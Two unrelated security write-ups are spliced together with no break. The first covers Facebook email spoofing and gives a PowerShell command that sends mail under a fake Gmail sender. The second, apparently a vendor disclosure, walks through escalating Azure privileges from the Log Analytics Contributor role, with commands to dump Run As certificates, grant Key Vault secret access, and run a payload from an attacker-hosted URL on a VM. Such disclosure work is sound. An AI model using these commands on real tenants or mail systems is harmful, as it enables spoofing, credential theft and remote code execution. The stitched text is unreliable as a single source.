In November of 2010, Facebook introduced their “@facebook.com” messaging option, which gave users the opportunity to create their own facebook.com email address. Currently, all Facebook users have the ability to claim their own facebook.com email address; it’s easily accessible from the “messages” page if your account has not already been set up for it. While the service is a nice way of communicating with non-Facebook friends via email and the Facebook message dashboard, it also opens up some security issues. Facebook accepts incoming email messages for delivery at their MX record, smtpin.mx.facebook.com (66.220.155.14). These messages are currently accepted for delivery based on their source IP address and whether or not that address has an associated PTR record. This is supposed to prevent spoofing, but the mail server only checks that the connecting IP has a valid PTR record; it does not check whether the domain in the sender’s email address actually corresponds to the connecting mail server. To fix this, Facebook needs to ensure that a message claiming to come from a gmail.com address actually originates from a Gmail mail server. Messages from IP addresses without PTR records are rejected by the Facebook mail server. SMTP connection attempt from an IP without a PTR record:
$ telnet 66.220.155.14 25
Trying 66.220.155.14...
Connected to smtpin.mx.facebook.com (66.220.155.14).
Escape character is '^]'. 
554 5.1.8 DNS-P3 http://postmaster.facebook.com/response_codes? #dns-p No PTR Record
Connection closed by foreign host.
The Facebook mail server does, however, allow incoming messages from IPs with a PTR record, which allows us to spoof messages from other users. If you are behind an IP address with a PTR record, you can spoof a message from an external domain to a facebook.com email address. Currently, Facebook is properly blocking incoming messages that spoof a facebook.com domain. If Facebook gets breached and their semi-private @facebook.com email addresses are leaked publicly, someone could easily start spoofing messages between users to propagate spam, phishing attacks, and/or malware. Right now, it’s not very hard to guess someone’s Facebook email address based on their Facebook username, so Facebook needs to implement a filter that ensures the IP address from which a message originates matches the MX record for the domain the message claims to come from. This would prove the sender of the message is on the same domain as the address they are claiming to represent. It does not outright remove the risk of spoofing between users, but it’s a good start. Currently Facebook does provide some notification on suspicious messages, but this equates to a small yellow triangle in the right-hand corner of the message; it’s not very obvious and could easily be interpreted as “important” or “urgent.” The above message was sent from my spoofed Gmail address to my @facebook.com address. It should be noted that Facebook is not the only site that falls victim to SMTP spoofing issues. Many of the social networking sites that allow users to accept emails as messages may be vulnerable to the same issues.
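
As an illustration of the delivery path described above, this sketch submits a message directly to the Facebook MX while claiming a gmail.com sender; the addresses are placeholders, and delivery would only be accepted from an IP with a PTR record, as discussed:

# Hypothetical example - the sender and recipient addresses are placeholders
Send-MailMessage -SmtpServer 'smtpin.mx.facebook.com' -Port 25 `
    -From 'someone@gmail.com' `
    -To 'victim.username@facebook.com' `
    -Subject 'Spoofed message test' `
    -Body 'This message claims to be from Gmail but never touched a Google mail server.'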
Escalating Azure Privileges with the Log Analytics Contributor Role

TL;DR - This issue has already been fixed, but it was a fairly minor privilege escalation that allowed an Azure AD user to escalate from the Log Analytics Contributor role to a full Subscription Contributor role.

The Log Analytics Contributor Role is intended to be used for reading monitoring data and editing monitoring settings. These rights also include the ability to run extensions on Virtual Machines, read deployment templates, and access keys for Storage accounts.

Based on the role’s previous rights on the Automation Account service (Microsoft.Automation/automationAccounts/*), the role could have been used to escalate privileges to the Subscription Contributor role by modifying existing Automation Accounts that are configured with a Run As account. This issue was reported to Microsoft in 2020 and has since been remediated.
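
If you want to verify what the role grants today, the current action list can be pulled with the Az PowerShell module (assuming you are already authenticated with Connect-AzAccount):

# Dump the current permissions of the built-in Log Analytics Contributor role
(Get-AzRoleDefinition -Name 'Log Analytics Contributor').Actions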

Escalating Azure Permissions

Automation Account Run As accounts are initially configured with Contributor rights on the subscription. Because of this, an attacker with access to the Log Analytics Contributor role could create a new runbook in an existing Automation Account and execute code from the runbook as a Contributor on the subscription.
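
In practice, the runbook creation and execution could be driven entirely from the Az Automation cmdlets; a rough sketch, where the resource group, Automation Account, and local runbook script are hypothetical:

# Hypothetical target names and a local runbook script containing the code to run
$rg      = 'TargetResourceGroup'
$account = 'TargetAutomationAccount'

# Import and publish a PowerShell runbook, then start it; code inside the runbook
# can authenticate with the Automation Account's AzureRunAsConnection
Import-AzAutomationRunbook -ResourceGroupName $rg -AutomationAccountName $account `
    -Name 'EscalationDemo' -Type PowerShell -Path .\EscalationDemo.ps1 -Published
Start-AzAutomationRunbook -ResourceGroupName $rg -AutomationAccountName $account -Name 'EscalationDemo'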

These Contributor rights would have allowed the attacker to create new resources on the subscription and modify existing resources. This includes Key Vault resources, where the attacker could add their account to the access policies for the vault, granting themselves access to the keys and secrets stored in the vault.
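
As one concrete example of what those Contributor rights would allow, the attacker could add themselves to a vault’s access policy and then read its secrets; a sketch with hypothetical vault and object ID values:

# Hypothetical vault name and attacker object ID
Set-AzKeyVaultAccessPolicy -VaultName 'TargetVault' `
    -ObjectId '00000000-0000-0000-0000-000000000000' `
    -PermissionsToSecrets get,list -PermissionsToKeys get,list

# With the policy in place, enumerate the stored secrets
Get-AzKeyVaultSecret -VaultName 'TargetVault'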

Finally, by exporting the Run As certificate from the Automation Account, an attacker would be able to create a persistent Az (CLI or PowerShell module) login as a subscription Contributor (the Run As account).

Since this issue has already been remediated, we will show how we went about explaining the issue in our Microsoft Security Response Center (MSRC) submission.

Attack Walkthrough

Using an account with the Owner role applied to the subscription (kfosaaen), we created a new Automation Account (LAC-Contributor) with the “Create Azure Run As account” option set to “Yes”. An Owner role is required for this step, as Contributors do not have rights to add the Run As account.
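
For reference, the Automation Account itself could also have been created from PowerShell; the Run As account in this walkthrough was added through the portal option shown below, and the resource group and region here are assumptions:

# Assumed resource group and region
New-AzAutomationAccount -ResourceGroupName 'LAC-Demo-RG' -Name 'LAC-Contributor' -Location 'East US'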

Add Automation Account

Note that the Run As account (LAC-Contributor_a62K0LQrxnYHr0zZu/JL3kFq0qTKCdv5VUEfXrPYCcM=) was added to the Azure tenant and is now listed in the subscription IAM tab as a Contributor.

Access Control

In the subscription IAM tab, we assigned the “Log Analytics Contributor” role to an Azure Active Directory user (LogAnalyticsContributor) with no other roles or permissions assigned to the user at the tenant level.
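
The equivalent role assignment can also be made from the Az module; a minimal sketch in which the user principal name and subscription ID are placeholders:

# Placeholder UPN and subscription ID
New-AzRoleAssignment -SignInName 'LogAnalyticsContributor@example.com' `
    -RoleDefinitionName 'Log Analytics Contributor' `
    -Scope '/subscriptions/00000000-0000-0000-0000-000000000000'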

Role added

On a system with the Az PowerShell module installed, we opened a PowerShell console and logged in to the subscription with the Log Analytics Contributor user and the Connect-AzAccount function.

PS C:\temp> Connect-AzAccount
 
Account SubscriptionName TenantId Environment
------- ---------------- -------- -----------
LogAnalyticsContributor kfosaaen 6[REDACTED]2 AzureCloud

Next, we downloaded the MicroBurst tools and imported the module into the PowerShell session.

PS C:\temp> import-module C:\temp\MicroBurst\MicroBurst.psm1
Imported AzureAD MicroBurst functions
Imported MSOnline MicroBurst functions
Imported Misc MicroBurst functions
Imported Azure REST API MicroBurst functions

Using the Get-AzPasswords function in MicroBurst, we collected the Automation Account credentials. This function created a new runbook (iEhLnPSpuysHOZU) in the existing Automation Account that exported the Run As account certificate for the Automation Account.

PS C:\temp> Get-AzPasswords -Verbose 
VERBOSE: Logged In as LogAnalyticsContributor@[REDACTED]
VERBOSE: Getting List of Azure Automation Accounts...
VERBOSE: Getting the RunAs certificate for LAC-Contributor using the iEhLnPSpuysHOZU.ps1 Runbook
VERBOSE: Waiting for the automation job to complete
VERBOSE: Run AuthenticateAs-LAC-Contributor-AzureRunAsConnection.ps1 (as a local admin) to import the cert and login as the Automation Connection account
VERBOSE: Removing iEhLnPSpuysHOZU runbook from LAC-Contributor Automation Account
VERBOSE: Password Dumping Activities Have Completed

We then used the MicroBurst created script (AuthenticateAs-LAC-Contributor-AzureRunAsConnection.ps1) to authenticate to the Az PowerShell module as the Run As account for the Automation Account. As we can see in the output below, the account we authenticated as (Client ID - d0c0fac3-13d0-4884-ad72-f7b5439c1271) is the “LAC-Contributor_a62K0LQrxnYHr0zZu/JL3kFq0qTKCdv5VUEfXrPYCcM=” account and it has the Contributor role on the subscription.

PS C:\temp> .\AuthenticateAs-LAC-Contributor-AzureRunAsConnection.ps1
PSParentPath: Microsoft.PowerShell.Security\Certificate::LocalMachine\My
Thumbprint Subject
---------- -------
A0EA38508EEDB78A68B9B0319ED7A311605FF6BB DC=LAC-Contributor_test_7a[REDACTED]b5
Environments : {[AzureChinaCloud, AzureChinaCloud], [AzureCloud, AzureCloud], [AzureGermanCloud, AzureGermanCloud],
[AzureUSGovernment, AzureUSGovernment]}
Context : Microsoft.Azure.Commands.Profile.Models.Core.PSAzureContext

PS C:\temp> Get-AzContext | select Account,Tenant
Account Subscription
------- ------
d0c0fac3-13d0-4884-ad72-f7b5439c1271 7a[REDACTED]b5
PS C:\temp> Get-AzRoleAssignment -ObjectId bc9d5b08-b412-4fb1-a71e-a39036fd2b3b
RoleAssignmentId : /subscriptions/7a[REDACTED]b5/providers/Microsoft.Authorization/roleAssignments/0eb7b73b-39e0-44f5-89fa-d88efc5fe352
Scope : /subscriptions/7a[REDACTED]b5
DisplayName : LAC-Contributor_a62K0LQrxnYHr0zZu/JL3kFq0qTKCdv5VUEfXrPYCcM=
SignInName :
RoleDefinitionName : Contributor
RoleDefinitionId : b24988ac-6180-42a0-ab88-20f7382dd24c
ObjectId : bc9d5b08-b412-4fb1-a71e-a39036fd2b3b
ObjectType : ServicePrincipal
CanDelegate : False
Description :
ConditionVersion :
Condition :
LAC Contributor

MSRC Submission Timeline

Microsoft was great to work with on the submission and they were quick to respond to the issue. They have since removed the Automation Accounts permissions from the affected role and updated documentation to reflect the issue.

Custom Azure Automation Contributor Role

Here’s a general timeline of the MSRC reporting process:

  • NetSPI initially reports the issue to Microsoft – 10/15/20
  • MSRC Case 61630 created – 10/19/20
  • Follow up email sent to MSRC – 12/10/20
  • MSRC confirms the behavior is a vulnerability and should be fixed – 12/11/20
  • Multiple back and forth emails to determine disclosure timelines – March-July 2021
  • Microsoft updates the role documentation to address the issue – July 2021
  • NetSPI does initial public disclosure via DEF CON Cloud Village talk – August 2021
  • Microsoft removes Automation Account permissions from the LAC Role – August 2021

Postscript

While this blog doesn’t address how to escalate up from the Log Analytics Contributor role, there are many ways to pivot from the role. Here are some of its other permissions: 

                "actions": [
                    "*/read",
                    "Microsoft.ClassicCompute/virtualMachines/extensions/*",
                    "Microsoft.ClassicStorage/storageAccounts/listKeys/action",
                    "Microsoft.Compute/virtualMachines/extensions/*",
                    "Microsoft.HybridCompute/machines/extensions/write",
                    "Microsoft.Insights/alertRules/*",
                    "Microsoft.Insights/diagnosticSettings/*",
                    "Microsoft.OperationalInsights/*",
                    "Microsoft.OperationsManagement/*",
                    "Microsoft.Resources/deployments/*",
                    "Microsoft.Resources/subscriptions/resourcegroups/deployments/*",
                    "Microsoft.Storage/storageAccounts/listKeys/action",
                    "Microsoft.Support/*"
                ]

More specifically, this role can pivot to Virtual Machines via Custom Script Extensions and list out Storage Account keys. You may be able to make use of a Managed Identity on a VM, or find something interesting in the Storage Account.
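
As a rough sketch of those two pivots, assuming the role is already authenticated with Connect-AzAccount and that all resource names and the script URL below are hypothetical:

# Run an attacker-hosted script on a VM through a Custom Script Extension
Set-AzVMCustomScriptExtension -ResourceGroupName 'TargetRG' -VMName 'TargetVM' `
    -Location 'East US' -Name 'DemoExtension' `
    -FileUri 'https://attackerstorage.blob.core.windows.net/tools/payload.ps1' `
    -Run 'payload.ps1'

# List keys for a Storage Account, allowed by Microsoft.Storage/storageAccounts/listKeys/action
Get-AzStorageAccountKey -ResourceGroupName 'TargetRG' -Name 'targetstorageaccount'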

Looking for an Azure pentesting partner? Consider NetSPI.
